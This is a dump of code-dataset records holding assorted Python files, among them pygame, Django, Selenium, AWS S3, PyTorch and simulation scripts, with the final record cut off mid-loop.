scene.\n\t\t\"\"\"\n\t\ttransition_image = pg.Surface(self.transition_rect.size)\n\t\ttransition_image.fill(c.TRANSITION_COLOR)\n\t\ttransition_image.set_alpha(self.transition_alpha)\n\t\tself.draw_level(surface)\n\t\tsurface.blit(transition_image, self.transition_rect)\n\t\tself.transition_alpha += c.TRANSITION_SPEED\n\t\tif self.transition_alpha >= 255:\n\t\t\tself.transition_alpha = 255\n\t\t\tself.done = True\n\n\tdef transition_in(self, surface, *args):\n\t\t\"\"\"\n\t\tTransition into level.\n\t\t\"\"\"\n\t\tself.viewport_update()\n\t\ttransition_image = pg.Surface(self.transition_rect.size)\n\t\ttransition_image.fill(c.TRANSITION_COLOR)\n\t\ttransition_image.set_alpha(self.transition_alpha)\n\t\tself.draw_level(surface)\n\t\tsurface.blit(transition_image, self.transition_rect)\n\t\tself.transition_alpha -= c.TRANSITION_SPEED\n\t\tif self.transition_alpha <= 0:\n\t\t\tself.state = 'normal'\n\t\t\tself.transition_alpha = 0\n\n\tdef update(self, surface, keys):\n\t\t\"\"\"\n\t\tUpdate state.\n\t\t\"\"\"\n\t\tstate_function = self.state_dict[self.state]\n\t\tstate_function(surface, keys)\n\n\tdef viewport_update(self):\n\t\t\"\"\"\n\t\tUpdate viewport so it stays centered on character,\n\t\tunless at edge of map.\n\t\t\"\"\"\n\t\tself.viewport.center = self.player.rect.center\n\t\tself.viewport.clamp_ip(self.level_rect)\n\n\tdef draw_level(self, surface):\n\t\t\"\"\"\n\t\tBlit all images to screen.\n\t\t\"\"\"\n\t\tself.game_screen.fill(c.BLACK)\n\t\tself.level_surface.blit(self.map_image, self.viewport, self.viewport)\n\t\tself.level_surface.blit(self.player.image, self.player.rect)\n\t\t#self.sprites.draw(self.level_surface)\n\n\t\tsurface.blit(self.level_surface, (0, 0), self.viewport)\n","sub_path":"data/states/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"639954297","text":"def send(self, command, prompt=None, answer=None, send_only=False):\n '\\n Sends the command to the device in the opened shell\\n '\n try:\n self._history.append(command)\n self._ssh_shell.sendall((b'%s\\r' % command))\n if send_only:\n return\n response = self.receive(command, prompt, answer)\n return to_text(response, errors='surrogate_or_strict')\n except (socket.timeout, AttributeError):\n display.vvvv(traceback.format_exc(), host=self._play_context.remote_addr)\n raise AnsibleConnectionFailure(('timeout trying to send command: %s' % command.strip()))","sub_path":"Data Set/bug-fixing-4/52c87c4691e3b04c53f4865b240510f31504a9a0--fix.py","file_name":"52c87c4691e3b04c53f4865b240510f31504a9a0--fix.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"434856706","text":"a = []\r\nb = []\r\nflag = False\r\nwhile flag == False:\r\n num = int(input('Ingrese un valor: '))\r\n if num != -1:\r\n a.append(num)\r\n else:\r\n flag = True\r\n\r\nprint(a)\r\nfor i in range(len(a)):\r\n b.append(a[(len(a)-1) - i])\r\nprint(b)\r\n","sub_path":"Facultad Fundamentos/TP6/ejer5.py","file_name":"ejer5.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"280845637","text":"#!/software/VERSIONS/python2-2.7.6/bin/python\nimport sys,platform,time\ninputFiles = sys.argv[1]\ninputFilesList = inputFiles.split(',')\noutput = sys.argv[2]\nsleep = int(sys.argv[3])\njobName = sys.argv[4]\n#if len(sys.argv) > 3:\n# sleep = int(sys.argv[3])\n#else:\n# sleep = 1\ntime.sleep(sleep)\noutputLines = []\nfor iFile in inputFilesList:\n f = open(iFile,'r')\n lines = f.readlines()\n f.close()\n lines.insert(0,'Job['+jobName+'] Run on machine: '+str(platform.node())+'\\tSlept for '+str(sleep)+' seconds\\n')\n lines.insert(1,'---------------FILE '+iFile+' STARTED HERE---------------------\\n')\n lines.append('---------------FILE '+iFile+' ENDED HERE---------------------\\n\\n')\n outputLines.extend(lines)\nf = open(output,'w')\nf.writelines(outputLines)\nf.close()\n\n","sub_path":"example1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"422682028","text":"from selenium import webdriver\nimport unittest\nimport time\nfrom HTMLTestRunner import HTMLTestRunner\n\nclass Baidu(unittest.TestCase):\n '''百度搜索测试'''\n def setUp(self):\n self.driver=webdriver.Chrome()\n self.driver.maximize_window()\n self.driver.implicitly_wait(10)\n self.base_url=\"http://www.baidu.com\"\n def test_baidu_search(self):\n '''搜索关键字 HTMLTestRunner'''\n driver=self.driver\n driver.get(self.base_url+\"/\")\n driver.find_element_by_id(\"kw\").clear()\n driver.find_element_by_id(\"kw\").send_keys('unittest')\n driver.find_element_by_id(\"su\").click()\n time.sleep(2)\n # title=driver.title\n # self.assertEqual(title,\"unittest_百度搜索\")\n def tearDown(self):\n self.driver.quit()\nif __name__==\"__main__\":\n unittest.main()\n # testunit=unittest.TestSuite()\n # testunit.addTest(Baidu(\"test_baidu_search\"))\n # #按照一定格式获取当前时间\n # now=time.strftime(\"%Y-%m-%d %H-%M-%S\")\n # #定义报告存放路径\n # filename='D:\\\\python自动化脚本\\\\test_project\\\\report\\\\'+now+' result.html'\n # fp=open(filename,'wb')\n # #定义测试报告\n # runner = HTMLTestRunner(stream=fp , \n # title = '百度搜索测试报告' , description = ' 用例执行情况:')\n # runner.run(testunit)#运行测试用例\n # fp.close()\n #代码分析:首先将htmltestrunner模块用import导入进来 2.通过open方法以二进制写模式代开当前目录下的result。html \n #如果没有则自动创建该文件,最后通过HTMLTestRunner的run()方法来运行测试套件中所组装的测试用例。最后通过close关闭测试报告文件\n\n","sub_path":"python/Test_RootFramwork/Test_case/test_baidu.py","file_name":"test_baidu.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"519727867","text":"import os\nimport boto3\nimport base64\n\n# ------------------------------\n# CITS5503\n#\n# cloudstorage.py\n#\n# skeleton application to copy local files to S3\n#\n# Given a root local directory, will return files in each level and\n# copy to same path on S3\n#\n# ------------------------------ \n\n\nROOT_DIR = '.'\n# user name\nROOT_S3_DIR = '22302319-cloudcomputing'\n\ns3 = boto3.resource(\"s3\")\n\nbucket_config = {'LocationConstraint': 'ap-southeast-2'}\n\n\ndef upload_file(folder_name, file, file_name):\n # upload\n s3.meta.client.upload_file(file.replace(\"./\", \"\"), ROOT_S3_DIR,\n \"{}/{}\".format(folder_name.rstrip(\"/\"), file_name).replace(\"./\", \"\"))\n print(\"Uploading %s\" % file)\n\n\n# Main program\n# Insert code to create bucket if not there\ns3 = boto3.client('s3')\nbucket = s3.create_bucket(Bucket=ROOT_S3_DIR,\n CreateBucketConfiguration=bucket_config)\n\nif bucket.creation_date:\n print(\"The bucket exists\")\nelse:\n print(f\"The bucket does not exist, a new bucket {ROOT_S3_DIR} created\")\n\n# try:\n#\n# print(response)\n# except Exception as error:\n# pass\n\n\n# parse directory and upload files\n\nfor dir_name, subdir_list, file_list in os.walk(ROOT_DIR, topdown=True):\n if dir_name != ROOT_DIR:\n for fname in file_list:\n upload_file(\"%s/\" % dir_name[2:], \"%s/%s\" % (dir_name, fname), fname)\n\nprint(\"done\")\n","sub_path":"aws/lab03/cloudstorage.py","file_name":"cloudstorage.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"263045583","text":"'''\nAuthor: your name\nDate: 2021-07-02 18:13:07\nLastEditTime: 2021-07-08 16:41:27\nLastEditors: Please set LastEditors\nDescription: In User Settings Edit\nFilePath: /genetic-drawing/3.py\n'''\nimport imageio\nimport os\nimport cv2\n'''\n# 只支持png格式,需要先命名排序好(默认按照字母序排列)\n# source(字符串):素材图片路径,生成的gif也保存在该路径\n# gifname(字符串):生成的gif的文件名,命名时带后缀如:'1.gif'\n# time(数字):生成的gif每一帧的时间间隔,单位(s)\n'''\ndef png2gif(source, gifname, time):\n #os.chdir(source) # os.chdir():改变当前工作目录到指定的路径\n file_list = os.listdir(source) # os.listdir():文件夹中的文件/文件夹的名字列表\n frames = [] #读入缓冲区\n file_list = sorted(file_list)\n for png in file_list:\n frames.append(imageio.imread(os.path.join(source,png)))\n imageio.mimsave(gifname, frames, 'GIF', duration=time)\n\ndef png2mp4(source, name):\n fps = 30 #FPS\n size=(958, 720) #图片、视频尺寸 w,h\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n videoWriter = cv2.VideoWriter(name,fourcc,fps,size, True)\n file_list = os.listdir(source) # os.listdir():文件夹中的文件/文件夹的名字列表\n frames = [] #读入缓冲区\n file_list = sorted(file_list)\n if len(file_list) < 400:\n for png in file_list:\n frame = cv2.imread(os.path.join(source,png))\n videoWriter.write(frame)\n else:\n for i in range(len(file_list)):\n if i < 400:\n png = file_list[i]\n frame = cv2.imread(os.path.join(source,png))\n videoWriter.write(frame)\n else:\n if i%5==0:\n png = file_list[i]\n frame = cv2.imread(os.path.join(source,png))\n videoWriter.write(frame)\n videoWriter.release()\n\n \naddress = \"out\"\n#png2gif(address, '02.gif', 0.1)\npng2mp4(address, '03.mp4')\n","sub_path":"png2gif-mp4.py","file_name":"png2gif-mp4.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"243044380","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import manifold, datasets\nfrom Simulator import Simulator\nfrom PoincareMapper import PoincareMapper\nimport Equation\nimport math\nfrom scipy.integrate import odeint\nfrom FitzSimulator import FitzSimulator\nimport matplotlib.cm as cm\nimport matplotlib.colors as colors\n\n\nnewData = True\n\nif newData:\n fitz = FitzSimulator()\n print('Simulating system')\n data = fitz.states(duration = 200000, split = 0.1, rtol = 1.49012e-9, atol = 1.49012e-9)\n print('Interpolating curve')\n data = fitz.interpolateCurve()[1000:]\n\n np.savetxt('DataFitz.txt',data)\nelse:\n data = np.loadtxt('DataFitz.txt')\n\n# normalVector = np.array([0,0,1/math.sqrt(2),1/math.sqrt(2)]) # Includes extreme events\nnormalVector = np.array([1/math.sqrt(2),1/math.sqrt(2),0,0]) # Orthogonal to extreme events\n# normalVector = np.array([0,0,1,0])\n\nprint('Constructing Poincare section')\nmapper = PoincareMapper(normalVector,data)\npoincareSection = np.array(mapper.getValues())\ninterindxes = mapper.getIntersctIndx()\n\n\npoincareSection2 = np.array([point for point in poincareSection if(point[2]<0.1)])\n\nextremeEvents = []\nindex = []\nfor i,point in enumerate(poincareSection):\n if point[2] > 0.1:\n extremeEvents.append(i)\n else:\n index.append(i)\nextremeEvents = np.array(extremeEvents)\nprint('Number of extreme events = %g' % len(extremeEvents))\n\nprint(\"Computing LLE embedding of return map\")\nmanifoldOfPoincareSection, err = manifold.locally_linear_embedding(poincareSection2,n_neighbors=8,n_components=2,method = 'modified') # return map then manifold\nprint(\"Done. Reconstruction error: %g\" % err)\n\n## Fix colors for Plot\ncol = col = cm.get_cmap('plasma')\nnormdata = [np.linalg.norm(point) for point in poincareSection2]\nnormalize = colors.Normalize(vmin=min(normdata), vmax=max(normdata))\ndataColors = [col(normalize(value)) for value in normdata]\npoincColor = [dataColors[i] for i in range(0,len(poincareSection2))]\n\nprint('Plotting data')\nfig = plt.figure()\n\nax = fig.add_subplot(221)\nax.set_title('Oscillator 1')\nax.plot(data[:,0],data[:,2], alpha = 0.5)\nax.scatter(poincareSection2[:,0],poincareSection2[:,2],c = poincColor, alpha = 0.8)\n\nax = fig.add_subplot(222)\nax.set_title('Oscillator 2')\nax.plot(data[:,1],data[:,3], alpha = 0.5)\nax.scatter(poincareSection2[:,1],poincareSection2[:,3],c = poincColor, alpha = 0.8)\n\nax = fig.add_subplot(223)\nax.set_title('Reembedded Poincaré Section')\nax.scatter(manifoldOfPoincareSection[:,0],manifoldOfPoincareSection[:,1],c = poincColor)\nax.scatter(manifoldOfPoincareSection[extremeEvents-1,0],manifoldOfPoincareSection[extremeEvents-1,1],c = 'r')\n\nax = fig.add_subplot(224)\nax.set_title('Return map of reembedded Poincaré section')\nax.scatter(manifoldOfPoincareSection[:-1,0],manifoldOfPoincareSection[1:,0],c = poincColor[1:], s = 5)\nax.scatter(manifoldOfPoincareSection[extremeEvents,0],manifoldOfPoincareSection[extremeEvents+1,0], c = 'r')\n\n\nplt.show()\n","sub_path":"FitzSeparator.py","file_name":"FitzSeparator.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"327291375","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.wait import WebDriverWait as wait\r\nfrom time import gmtime, strftime\r\nimport os.path\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nimport time\r\nfrom selenium.common.exceptions import TimeoutException\r\n\r\ndef test_add_video_to_youtube(app):\r\n wd = app.wd\r\n actions = ActionChains(wd)\r\n \r\n # Login\r\n app.open_page(\"\")\r\n app.login(\"ua.sacred\", \"26661390\")\r\n \r\n # adding video and cheking of link\r\n wd.find_element_by_xpath(\"//a[@data-upsell='upload']\").click()\r\n video_file = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"../resources/video/17_07_201613901.mp4\"))\r\n wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//input[@type='file']\")).send_keys(video_file)\r\n wait(wd, 30).until(lambda s: wd.find_element_by_xpath(\"//span[@class='progress-bar-text-done']\")).is_displayed()\r\n wait(wd, 60).until(lambda s: wd.find_element_by_xpath(\"//*[@id='active-uploads-contain']//*[contains(@class,'metadata-save-button')]//button\")).click()\r\n wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//input[@name='share_url']\")).is_displayed()\r\n\r\n \r\n # Check of adding video by name\r\n video_title = wd.find_element_by_xpath(\"//div[@class='item-title upload-cursor-pointer']\").text \r\n app.open_page(\"\")\r\n wd.find_element_by_xpath(\"//input[@name='search_query']\").click()\r\n #actions.send_keys(video_title).perform() - no text\r\n # add request to link\r\n app.open_page(\"results?search_query=17_07_201613901+\") \r\n i = 0 \r\n while i<9:\r\n try: \r\n wait(wd, 10).until(lambda s: wd.find_element_by_xpath(\"//a[contains(@href,'watch') and contains(.,'17_07_201613901')]\")).is_displayed()\r\n break\r\n except TimeoutException:\r\n app.open_page(\"results?search_query=17_07_201613901+\")\r\n i += 1\r\n assert wd.find_element_by_xpath(\"//a[contains(@href,'watch') and contains(.,'17_07_201613901')]\").is_displayed() \r\n \r\n # sw.lang.\r\n wd.find_element_by_xpath(\"//button[@id='yt-picker-language-button']\").click()\r\n wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//button//span[.='English (US)']\")).click()\r\n app.open_page(\"results?search_query=17_07_201613901+\")\r\n assert wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//span[@class='yt-uix-button-content' and .='Filters']\")).is_displayed()\r\n \r\n # Delete video\r\n app.open_page(\"my_videos?o=U\")\r\n wd.find_element_by_xpath(\"//button[contains(@class,'edit-expand')]\").click()\r\n wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//span[.='Delete']\")).click()\r\n wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//span[.='Yes, delete']\")).click()\r\n #wd.close()\r\n \r\n","sub_path":"tests/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"228400627","text":"\"\"\"\nDjango settings for store project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.10.5/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.10.5/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os , sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nPROJECT_ROOT = os.path.abspath(os.path.join(BASE_DIR, os.pardir))\n\n# Append Apps Folder to PYTHONPATH\nsys.path.append(os.path.join(BASE_DIR, 'apps'))\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '#x8^)n$qwo@oy8=n%hz+ukdu*awuv8z03!!tpk(_3-u56i=)17'\n\nALLOWED_HOSTS = []\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'easy_thumbnails',\n 'filer',\n 'mptt',\n 'crispy_forms',\n 'profiles',\n 'products',\n 'cart',\n 'checkout',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'store.urls'\n\nWSGI_APPLICATION = 'store.wsgi.application'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'db.sqlite3',\n 'HOST': '',\n 'USER': '',\n 'PASSWORD': '',\n 'PORT': ''\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.10.5/topics/i18n/\n\nLANGUAGES = [\n ('en-us', 'English'),\n # ('cs-cz', 'Czech'),\n]\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Prague'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.10.5/howto/static-files/\n\nSTATIC_URL = '/static/'\n# STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n ],\n 'OPTIONS': {\n 'context_processors': [\n # Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this\n # list if you haven't customized them:\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.template.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n 'cart.context_processors.cart_count_processor',\n ],\n 'loaders' : [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n 'django.template.loaders.eggs.Loader',\n ]\n },\n },\n]\n\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n)\n\n# Easy Thumbnails Settings\nTHUMBNAIL_PROCESSORS = (\n 'easy_thumbnails.processors.colorspace',\n 'easy_thumbnails.processors.autocrop',\n 'filer.thumbnail_processors.scale_and_crop_with_subject_location',\n 'easy_thumbnails.processors.filters',\n)\n\nSITE_ID = 1\n\nCMS_PERMISSION = True\n\nAUTH_USER_MODEL = 'profiles.Profile'\n\nCRISPY_TEMPLATE_PACK = 'bootstrap3'\n\nFILER_DEBUG = True\n\n# Addresses Types\nADDRESS_TYPE = (\n ('billing', 'Billing'),\n ('shipping', 'Shipping'),\n)\n\n# Orders Statuses\nORDER_STATUS_CHOICES = (\n ('created', 'Created'),\n ('in_progress', 'In Progress'),\n ('paid', 'Paid'),\n ('shipped', 'Shipped'),\n ('canceled', 'Cancelled'),\n)\n","sub_path":"store/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"496918276","text":"from django.shortcuts import render, redirect\nfrom app.models import DogProduct, Purchase, DogTag\nfrom django.contrib import messages\nfrom datetime import datetime\nfrom app.forms import NewDogTagForm\n# Create your views here.\n\ndef home(request):\n dog_products = DogProduct.objects.all()\n return render(request, \"home.html\", {\"dog_products\": dog_products})\n\n\ndef dog_product_detail(request, id):\n dog_product = DogProduct.objects.get(id=id)\n return render(request, \"dog_product_detail.html\", {\"dog_product\": dog_product})\n\n\ndef purchase_dog_product(request, id):\n dog_product = DogProduct.objects.get(id=id)\n if dog_product.quantity != 0:\n messages.success(request, f\"Purchased {dog_product.name}\")\n dog_product.quantity -= 1\n dog_product.save()\n purchase = Purchase.objects.create(dog_product=dog_product, purchased_at=datetime.now())\n return redirect(\"purchase_detail\", purchase.id)\n else:\n messages.error(request, f\"{dog_product.name} is out of stock\")\n return redirect(\"dog_product_detail\", dog_product.id)\n\n\ndef purchase_detail(request, id):\n purchase = Purchase.objects.get(id=id)\n return render(request, \"purchase_detail.html\", {\"purchase\":purchase})\n\n\ndef new_dog_tag(request):\n if request.method == \"GET\":\n return render(request, \"new_dog_tag.html\")\n elif request.method == \"POST\":\n form = NewDogTagForm(request.POST)\n if form.is_valid():\n owner_name = form.cleaned_data[\"owner_name\"]\n dog_name = form.cleaned_data[\"dog_name\"]\n dog_birthday = form.cleaned_data[\"dog_birthday\"]\n owner_address = form.cleaned_data[\"owner_address\"]\n dog_color = form.cleaned_data[\"dog_color\"]\n new_dog_tag = DogTag.objects.create(owner_name=owner_name, dog_name=dog_name, dog_birthday=dog_birthday,\n dog_color=dog_color, owner_address=owner_address)\n return redirect(\"dog_tag_list\")\n if not form.is_valid():\n return render(request, \"new_dog_tag.html\", {\"form\":form})\n\n\ndef dog_tag_list(request):\n dog_tags = DogTag.objects.all()\n return render(request, \"dog_tag_list.html\", {\"dog_tags\":dog_tags})","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"625922567","text":"#!/usr/bin/env python3.5\n''' Utilities to help with discord permissions.\n'''\n\ndef get_permissions_value():\n ''' Get a permissions value as an integer that can be inserted in a Discord URL to\n invite a bot to a server.\n '''\n permissions = (\n # 0x00000400 READ_MESSAGES\n (1 << 10) +\n # 0x00000800 SEND_MESSAGES\n (1 << 11) +\n # 0x00004000 EMBED_LINKS\n (1 << 14) +\n # 0x00020000 MENTION_EVERYONE\n (1 << 18) +\n # 0x00040000 USE_EXTERNAL_EMOJIS\n (1 << 19)\n )\n return permissions\n","sub_path":"lib/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"2321217","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 27 07:26:22 2018\n\n@author: xsxsz\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\ndef add_layer(inputs,in_size,out_size,activation_function=None):\n Weights=tf.Variable(tf.random_normal([in_size,out_size]))\n biases=tf.Variable(tf.zeros([1,out_size])+0.1)\n W=tf.matmul(inputs,Weights)+biases\n if activation_function is None:\n outputs=W\n else:\n outputs=activation_function(W)\n return outputs\n\nx_data=np.linspace(-1,1,300)[:,np.newaxis]\nnoise=np.random.normal(0,0.05,x_data.shape)\ny_data=np.square(x_data)+noise-0.5\nxs=tf.placeholder(tf.float32,[None,1])\nys=tf.placeholder(tf.float32,[None,1])\nl1=add_layer(xs,1,10,activation_function=tf.nn.relu)\nprediction=add_layer(l1,10,1,activation_function=None)\nloss=tf.reduce_mean(tf.reduce_sum(tf.square(ys-prediction),reduction_indices=[1]))\nstep=tf.train.GradientDescentOptimizer(0.1).minimize(loss)\ninit=tf.global_variables_initializer()\nwith tf.Session() as sess:\n sess.run(init)\n fig=plt.figure(figsize=(6,6))\n ax=fig.add_subplot(111)\n plt.title('Plot')\n plt.xlabel('X')\n plt.ylabel('Y')\n ax.scatter(x_data,y_data,alpha=0.7)\n plt.ion()\n for i in range(4000):\n sess.run(step,feed_dict={xs:x_data,ys:y_data})\n if i %50==0:\n #print(sess.run(loss,feed_dict={xs:x_data,ys:y_data}))\n try:\n ax.lines.remove(lines[0])\n except Exception:\n pass\n prediction_value=sess.run(prediction,feed_dict={xs:x_data,ys:y_data})\n lines=ax.plot(x_data,prediction_value,color='r',linewidth=4)\n saver=tf.train.Saver()\n saver.save(sess,'tensorflow_save/tensorflow_7') \nplt.savefig('result.png')","sub_path":"tensorflow/tensorflow_7_regression.py","file_name":"tensorflow_7_regression.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"355941025","text":"import math\n\nFRAME_TIME = .2\nGRAVITY = 9.8\nPENDULUM_LENGTH = 300\nPENDULUM_MASS = 5\nLINEAR_SPEED_CONSTANT = 0.1\nQUADRATIC_SPEED_CONSTANT = 0.005\nBLACK = [0, 0, 0]\nWHITE = [255, 255, 255]\nRED = [255, 0, 0]\nBLUE = [0, 0, 255]\nGREEN = [0, 255, 0]\nSCREEN_WIDTH = 640\nSCREEN_HEIGHT = 480\nPIVOT = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 4)\nRECT_PARAMETERS = [PIVOT[0] - 25, PIVOT[1] - 10, 50, 20]\nPI = math.pi\n","sub_path":"simulations/simulation_lab_fis26/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"176137070","text":"# import pytest\n# Google --> Go$gle\n\n# aabbccddeeff --> a$b$c$d$e$f$\n\n# a:1, b:3, c:5, ---\n\ndef replace_repeated(c):\n hash = dict()\n c= list(c)\n for i in range(len(c)):\n if c[i] not in hash.keys():\n hash[c[i]] = 1\n else:\n c[i] = \"$\"\n return \"\".join(c)\n\na = input(\"Enter string\")\nprint(replace_repeated(a))\n\n# Unit Testing\n\ndef test_method():\n assert replace_repeated(\"aabbccddee\") == \"a$b$c$d$e$\"","sub_path":"assignment/strings/replace _first_string.py","file_name":"replace _first_string.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"100348617","text":"from torch import nn\nfrom icecream import ic\nimport random\nimport matplotlib.pyplot as plt\nimport time\nimport pickle\nimport torch\nimport csv\nimport os\nimport cv2\nimport numpy as np\nfrom icecream import ic\nfrom model import *\n\n\n\nprocessed_videos = pickle.load(open(\"C:\\\\Users\\\\admin\\\\PycharmProjects\\\\gesres\\\\saved\\\\par_videos.pkl\",\"rb\"))\nlabels = pickle.load(open(\"C:\\\\Users\\\\admin\\\\PycharmProjects\\\\gesres\\\\saved\\\\par_labels.pkl\",\"rb\"))\nprint(np.array(processed_videos).shape)\nprint(len(labels))\nprint(len(set(labels)))\nrandom.seed(1)\nnp.random.seed(1)\n\ndef shuffle(videos,labels):\n inds= list(range(len(videos)))\n print(inds)\n random.shuffle(inds)\n shuff_videos = []\n shuff_labels = []\n for i in inds:\n shuff_videos.append(videos[i])\n shuff_labels.append(labels[i])\n return shuff_videos,shuff_labels\n\n\nprocessed_videos, labels = shuffle(processed_videos,labels)\nic(\"Shuffled \",labels[:20])\n\n\ndef transformY(y):\n av = list(set(labels))\n keys_values = str(av)\n\n with open(\"label_index.txt\",\"w\") as f:\n f.write(keys_values)\n f.close()\n Y = []\n for x in y:\n Y.append(av.index(x))\n return np.array(Y)\n\nall_labels= transformY(labels)\nic(\"Shuffled \",labels[:20])\n\nall = np.array(processed_videos)\nall = all[:,np.newaxis,:,:,:]\n\nall = all[:1104]\nall_labels = all_labels[:1104]\nic(\"index \",all_labels[:20])\nk = 8\nic(all.shape[0])\nunit = all.shape[0]//8\nfor fold in range(1,k):\n onefold = time.time()\n\n if fold ==0:\n vX = all[:unit]\n vY = all_labels[:unit]\n ic(\"Validation 0:\",unit)\n else:\n vX = all[(fold) * unit:(fold + 1) * unit]\n vY = all_labels[(fold) * unit:(fold + 1) * unit]\n\n ic(\"Validation :\",fold* unit,\" : \", (fold+1)*unit)\n\n if fold == 0:\n X = all[unit:]\n Y = all_labels[unit:]\n else:\n X1 = all[:(fold)*unit]\n X2 = all[(fold+1)*unit:]\n\n\n Y1 = all_labels[:(fold)*unit]\n Y2 = all_labels[(fold+1)*unit: ]\n ic(\"Training 0 : \",(fold)*unit,\" \",(fold+1)*unit,\" : \")\n X = np.concatenate((X1,X2),axis = 0)\n print(Y1.shape,Y2.shape)\n Y = np.concatenate((Y1,Y2))\n\n ic(X.shape,Y.shape,vX.shape,vY.shape)\n\n\n X = torch.tensor(X,dtype=torch.float32)\n Y = torch.tensor(Y,dtype=torch.int64)\n vX = torch.tensor(vX,dtype=torch.float32)\n vY = torch.tensor(vY,dtype=torch.int64)\n ic(X.shape)\n\n\n model = Model(25)\n optim = torch.optim.Adam(model.parameters(), lr=0.0001)\n loss_fn = torch.nn.CrossEntropyLoss()\n h_loss = []\n h_acc = []\n vh_loss = []\n vh_acc = []\n\n for epoch in range(25):\n e_start = time.time()\n model.train()\n avg_acc = 0.0\n avg_loss = 0.0\n c = 0\n bs = 46\n for i in range(0, len(X), bs):\n print(\"=\"*(i//bs)+\">\",i,\"/\",len(X))\n XX = 